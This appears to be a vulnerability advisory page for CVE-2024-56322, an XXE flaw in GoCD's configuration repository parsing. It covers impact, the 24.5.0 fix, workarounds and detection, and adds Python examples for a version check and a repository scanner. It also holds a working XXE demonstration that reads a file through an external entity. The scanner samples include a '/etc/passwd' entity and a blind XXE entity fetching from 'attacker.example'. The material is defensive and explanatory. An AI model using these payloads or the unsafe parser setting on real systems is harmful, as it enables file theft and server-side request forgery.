CVE-2024-56322

7.2 HIGH
XXE

📋 TL;DR

GoCD versions 16.7.0 through 24.4.0 contain an XML External Entity (XXE) injection vulnerability in a hidden configuration repository feature. This allows GoCD administrators to execute XXE attacks when the server scans configuration repositories, potentially leading to server-side request forgery or data exfiltration. Only GoCD super administrators can exploit this vulnerability.
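The bug class matters more than the feature it lives in: an XML parser that resolves external general entities will pull whatever a `SYSTEM` identifier points at into the document, so anyone who can supply the XML (here, an administrator supplying a pipelines-as-code definition) can read files or make requests as the server. The block below is an added illustration, not GoCD's code and not the advisory's payload: it parses a constructed, XXE-shaped "pipeline definition" with Python's stdlib SAX parser twice, once with external entity resolution turned on (the vulnerable setup) and once with the hardened default, and shows that only the first run leaks the contents of a temporary file. File names, element names and the secret are all invented for the example.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collects the character data the parser hands back."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks).strip()


def parse_pipeline_xml(xml_text, resolve_external_entities):
    """Parse an XML document and return its text content.

    resolve_external_entities=True reproduces the XXE-prone configuration;
    False is the hardened default (Python >= 3.7.1), under which external
    general entities are left unexpanded. The real fix for a server is to
    reject DOCTYPE declarations outright so no DTD is processed at all.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.StringIO(xml_text))
    return collector.text()


def xxe_payload(target_path):
    """A constructed 'pipeline definition' carrying an external entity (hypothetical element names)."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE cruise [<!ENTITY xxe SYSTEM "file://{target_path}">]>\n'
        '<cruise><pipeline name="build"><description>&xxe;</description></pipeline></cruise>\n'
    )


def demo():
    """Return (text seen by the vulnerable parser, text seen by the hardened parser)."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret.txt")
        with open(secret, "w") as f:
            f.write("db-password=hunter2")  # constructed secret, stands in for a server credential file
        payload = xxe_payload(secret)
        leaked = parse_pipeline_xml(payload, resolve_external_entities=True)
        safe = parse_pipeline_xml(payload, resolve_external_entities=False)
        return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser saw:", repr(leaked))
    print("hardened parser saw:  ", repr(safe))
```

Swap the `file://` target for an `http://` URL to an internal service and the same mechanism becomes server-side request forgery, which is why the page's egress controls help but do not remove the file-read case.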

💻 Affected Systems

Products:
  • GoCD Continuous Delivery Server
Versions: 16.7.0 through 24.4.0 (inclusive)
Operating Systems: All platforms running GoCD
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerable code path is a hidden, normally unused configuration repository (pipelines as code) format that administrators can still select; no server setting disables it, so every affected version carries the parsing path whether or not the feature is in use.

📦 What is this software?

GoCD is an open-source continuous delivery server that models build, test and deployment workflows as pipelines. Its pipelines-as-code feature lets administrators register configuration repositories (version-controlled repositories holding pipeline definitions) that the server periodically checks out and parses; the vulnerable XML parsing happens during that scan.

⚠️ Risk & Real-World Impact

🔴

Worst Case

A malicious GoCD administrator could commit a pipeline definition containing an external entity and have the server read any file its process can access, or make HTTP requests to internal services on the server's behalf (SSRF), with the results exfiltrated through the parsed document or out-of-band requests. XXE by itself does not yield code execution; turning it into remote code execution would require an additional weakness in how the parsed content is used.

🟠

Likely Case

Limited. Only administrators who already control the server's configuration can trigger it, and such an account can already do comparable damage through legitimate features (for example by defining pipelines that run arbitrary commands on agents). What the bug adds is the ability to read server-side files and reach network locations that the normal administrative interface does not expose.

🟢

If Mitigated

Reduced impact. Egress controls stop out-of-band exfiltration to attacker-controlled hosts, but they do not stop an XXE payload from reading local files or reaching internal services the server is allowed to talk to; only upgrading removes the vulnerable code path.

🌐 Internet-Facing: LOW - Exploitation requires administrative access to GoCD, which should not be exposed to untrusted users.
🏢 Internal Only: MEDIUM - While only administrators can exploit it, insider threats or compromised admin accounts could leverage this vulnerability.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Exploitation requires GoCD administrator privileges and knowledge of the hidden configuration repository feature. The vulnerability triggers during periodic configuration repository scans or when manually triggered by an administrator.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: GoCD 24.5.0

Vendor Advisory: https://github.com/gocd/gocd/security/advisories/GHSA-8xwx-hf68-8xq7

Restart Required: Yes. The upgrade replaces the server installation, so the GoCD server process is restarted as part of it; no separate restart is needed afterwards.

Instructions:

1. Download GoCD 24.5.0 from the official releases page.
2. Follow the GoCD upgrade documentation for your deployment method (Docker, package manager, or manual install).
3. Verify the upgrade completed successfully by confirming the server now reports 24.5.0 or later (see How to Verify below).

🔧 Temporary Workarounds

Egress Control Workaround (applies to all platforms)

Prevent the GoCD server from making arbitrary outbound network requests, which limits what an XXE payload can exfiltrate to attacker-controlled hosts.

  • Configure host firewall rules so the GoCD server can only reach the material, artifact and plugin endpoints it legitimately needs
  • Use network policies or security groups to limit egress traffic at the network layer
  • Restrict DNS as well: out-of-band XXE exfiltration can encode data in DNS lookups, so let the server resolve names only through a controlled resolver

Caveat: egress filtering does not stop a payload from reading local files or reaching internal services the server is permitted to contact; treat it as a stopgap until the upgrade.

🧯 If You Can't Patch

  • Implement strict egress controls to prevent GoCD server from accessing arbitrary external locations
  • Review and restrict GoCD administrator privileges to only trusted personnel

🔍 How to Verify

Check if Vulnerable:

Read the server version: any GoCD server reporting a version from 16.7.0 up to and including 24.4.0 is affected, whether or not the hidden configuration repository format is in use. The version is shown in the server's admin UI, and GoCD also returns it from its version API (GET /go/api/version, requested with Accept: application/vnd.go.cd.v1+json), which is the practical way to check several servers at once.

Check Version:

Open the admin UI and read the displayed server version, or query the version API above; the JSON response carries the version string in its "version" field.

Verify Fix Applied:

Confirm the reported version is 24.5.0 or higher.
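A version check across a fleet is easy to get wrong (string comparison puts "9.0.0" after "16.7.0"), so the following added example, which is not GoCD's own tooling, parses the version string into a numeric tuple and classifies it against the advisory's range. It assumes the GoCD version API described above (`/go/api/version` with the `application/vnd.go.cd.v1+json` Accept header) and uses a constructed sample response so it runs offline; the hostname in the usage line is a placeholder.

```python
import json
import re
import urllib.request

# Range from the advisory: 16.7.0 through 24.4.0 inclusive; fixed in 24.5.0.
# 24.4.0 was the last release before the fix, so anything below 24.5.0 in the
# affected range is treated as needing the upgrade.
AFFECTED_MIN = (16, 7, 0)
FIXED = (24, 5, 0)

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """'24.4.0', or a longer build string that starts with it, -> (24, 4, 0).

    Tuples compare numerically; plain string comparison would rank '9.0.0'
    above '16.7.0'.
    """
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised GoCD version string: {text!r}")
    return tuple(int(part) for part in m.groups())


def assess(version_text):
    """Classify a reported version against CVE-2024-56322."""
    v = parse_version(version_text)
    if v >= FIXED:
        return "fixed"
    if v >= AFFECTED_MIN:
        return "affected"
    return "older than advisory range"


def version_from_api_response(body):
    """Pull the version string out of a /go/api/version JSON body."""
    return json.loads(body)["version"]


def fetch_version(base_url, timeout=10):
    """Ask a live server; assumes the standard GoCD version endpoint and media type."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/go/api/version",
        headers={"Accept": "application/vnd.go.cd.v1+json"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return version_from_api_response(resp.read().decode("utf-8"))


# Constructed sample response, shaped like the API's JSON (only the field we use matters).
SAMPLE_RESPONSE = json.dumps({"version": "24.4.0", "full_version": "24.4.0 (constructed sample)"})


if __name__ == "__main__":
    v = version_from_api_response(SAMPLE_RESPONSE)
    print(f"sample server reports {v}: {assess(v)}")
    # Against a real server (placeholder hostname):
    # v = fetch_version("https://gocd.example.com"); print(v, assess(v))
```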

📡 Detection & Monitoring

Log Indicators:

  • XML parsing errors in GoCD's server log that mention DOCTYPE, ENTITY or unresolved entities during a configuration repository scan
  • Configuration repository scan failures that coincide with a commit touching the repository's XML definitions
  • Outbound connections from the GoCD server process that do not correspond to a registered material, artifact store or plugin

Network Indicators:

  • Unexpected outbound HTTP/HTTPS requests from the GoCD server to hosts it has no registered material or plugin for
  • DNS lookups from the GoCD server for names it has no reason to resolve (attacker-controlled domains, or hostnames that also appear inside a committed definition)

SIEM Query:

source="gocd.log" AND ("XML" OR "XXE" OR "external entity" OR "configuration repository")

This is a broad keyword pull, not an alert: "configuration repository" matches routine scan messages, so use it to gather candidate lines and then narrow to parser errors that name a DOCTYPE, an ENTITY or an unresolved entity. GoCD's exact log wording varies by version, so check the query against your own logs before turning it into a detection rule.
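The log and network indicators above only fire after a payload has been parsed. Because the payload has to live in a configuration repository that the server checks out, the repository content itself can be audited before or independently of the scan. The following scanner is an added example (not GoCD code and not derived from the advisory) that flags DTD and external entity declarations in XML documents, using constructed sample definitions with invented element names. It assumes the definitions are plain .xml files, since the page does not name the hidden format's file extension.

```python
import os
import re
from dataclasses import dataclass

# XML keywords are case-sensitive, so a real DTD spells them exactly like this.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b")
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+"
    r"(?:SYSTEM\s+(?P<sysid>\"[^\"]*\"|'[^']*')"
    r"|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s+(?P<pubsys>\"[^\"]*\"|'[^']*'))"
)


@dataclass
class Finding:
    source: str
    kind: str       # "doctype", "general-entity" or "parameter-entity"
    name: str       # entity name; empty for the bare DOCTYPE finding
    system_id: str  # where the entity points (file:///..., http://..., ...)


def scan_xml_text(text, source="<inline>"):
    """Return every DTD and external entity declaration found in one XML document.

    A pipelines-as-code definition has no business carrying a DTD at all, so a
    DOCTYPE on its own is worth a look; an external entity (SYSTEM/PUBLIC) is the
    actual XXE vector, and a parameter entity (%) is the blind/out-of-band variant.
    """
    findings = []
    if DOCTYPE_RE.search(text):
        findings.append(Finding(source, "doctype", "", ""))
    for m in ENTITY_RE.finditer(text):
        sysid = (m.group("sysid") or m.group("pubsys"))[1:-1]  # drop surrounding quotes
        kind = "parameter-entity" if m.group("param") else "general-entity"
        findings.append(Finding(source, kind, m.group("name"), sysid))
    return findings


def scan_checkout(root):
    """Walk a config-repo checkout and scan every .xml file (the extension is an assumption)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(".xml"):
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as f:
                    findings.extend(scan_xml_text(f.read(), source=path))
    return findings


# Constructed samples; element names are invented and not GoCD's schema.
BENIGN = '<?xml version="1.0"?><cruise><pipeline name="build"/></cruise>'
CLASSIC_XXE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE cruise [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
    '<cruise><pipeline name="&xxe;"/></cruise>'
)
BLIND_XXE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE cruise [<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd;]>\n'
    '<cruise/>'
)

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("classic", CLASSIC_XXE), ("blind", BLIND_XXE)]:
        for finding in scan_xml_text(doc, source=label):
            print(finding)
```

Run `scan_checkout` against a fresh clone of each registered configuration repository, or wire `scan_xml_text` into a pre-receive hook on the repositories' hosting side so a definition carrying a DTD is rejected before the server ever fetches it.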

🔗 References

  • GoCD security advisory GHSA-8xwx-hf68-8xq7: https://github.com/gocd/gocd/security/advisories/GHSA-8xwx-hf68-8xq7
  • CVE record: https://www.cve.org/CVERecord?id=CVE-2024-56322
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2024-56322
